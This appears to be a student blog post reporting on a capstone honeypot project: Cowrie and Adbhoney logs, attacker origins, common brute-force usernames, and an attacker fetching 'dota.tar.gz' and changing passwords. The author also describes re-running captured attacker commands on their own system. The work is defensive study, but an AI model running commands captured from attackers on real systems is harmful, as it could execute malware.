Sweet Honey or a Cyber Trap?
An overview of my capstone project.
Oh sweet honeypots….but what is a honeypot? In cybersecurity, a honeypot is a decoy system intended to lure attackers into thinking it is a system with various vulnerabilities. Honeypots falsely appear vulnerable to trick attackers into attempting attacks against the system. When the attacker tries to strike against the system, the honeypot will replicate a successful attack and the person monitoring these attacks will be met with information regarding the attacks used against the honeypot.
For my capstone project, I was instructed to create my first honeypot and record the results in a report. In this report, I will be going over the information gathered from my honeypot.
The two main attacks that I will be analyzing are Cowrie attacks and Adbhoney attacks. Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. Adbhoney is a low interaction honeypot designed for Android Debug Bridge over TCP/IP.
Cowrie Attacks
When taking a look into the Cowrie attacks dashboard, I noticed that 66% of these attacks were coming from China. I decided to single out the attacks that were coming from China to see if there was anything interesting about them. I noticed that one specific attacker downloaded a specific file named ‘dota.tar.gz.’ By the command line input, this attacker was able to change the username and password. I was able to run the commands up until ‘cat /var/tmp/.var03522123 | head -n 1’ when the output revealed ‘/var/tmp/.var03522123’ didn’t exist on my system.
Since Cowrie is based on brute force attacks and shell interaction, many of these attacks have all used almost the same set of commands in order to change the password for the honeypot server, so they can gain access.
The figure to the left shows the top usernames used in the brute force attacks. The top three ‘root’, ‘admin’, and ‘user’ are usually the main usernames used when attackers are trying to brute force their way into some ones system. The reason why attackers usually try these first is because many systems do use these three usernames as their login information, even as passwords as well, which is not the best thing to do being that these are the most used in brute force attacks.
Adbhoney Attacks
For the Adbhoney attacks, I focused in on the specific IP sources that ran some commands. From three different IP sources under the same attacker AS/N, all IP sources ran the same commands as shown below.
I decided to spin up my honeypot in my terminal and run the same exact commands to see what they would do.
Running this command, the same command ran by these three IP sources, gave me some code for a webpage. In the code, there is a 404 ‘Not Found’ status code. This error message is a HTTP status code indicating the server could not find the requested website. This meaning the web browser can connect with the server, but the specific page cannot be reached.
Debrief
Deploying a honeypot allows you to view and understand the many attacks that are happening daily, almost every second of the day, not just on honeypots, but actual networks and computers within organizations. Most of these attacks are caught and dealt with, but there are always a couple attacks that end up being successful. Successful attacks can be prevented by having a security plan in place and finding any vulnerabilities within your own network that can be patched or fixed.
